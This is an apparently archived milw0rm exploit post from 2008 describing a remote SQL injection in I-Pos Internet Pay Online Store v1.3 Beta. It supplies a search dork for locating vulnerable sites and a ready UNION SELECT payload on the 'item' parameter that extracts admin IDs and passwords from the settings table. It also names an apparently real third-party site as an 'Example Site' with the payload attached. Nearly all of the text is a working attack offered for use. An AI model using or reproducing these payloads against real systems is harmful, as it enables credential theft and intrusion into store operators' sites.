[+] Title : I-Pos Internet Pay Online Store v1.3 Beta <= Remote SQL Injection Vulnerability ========================================================================================== [+] Author : KnocKout [+] Special ThanX : Dr.Kacak & Cr@zy-King and CW ALL USERS . . . [+] Cyber-Warrior.Org =========================================================================================== S. Name : I-Pos Internet Pay Online Store Version : 1.3 Beta Download : http://www.asprehberi.net/Indir.asp?IcerikID=1812&SessionID=358055325 Dork : "Powered by i-pos Storefront" Attackz; Http://Localsite.com/path/index.asp?item=[SQL Injection] Example Attack: http://localsite.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings Example Site: www.keysquality.com/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings ###################################################################################################### # milw0rm.com [2008-06-01]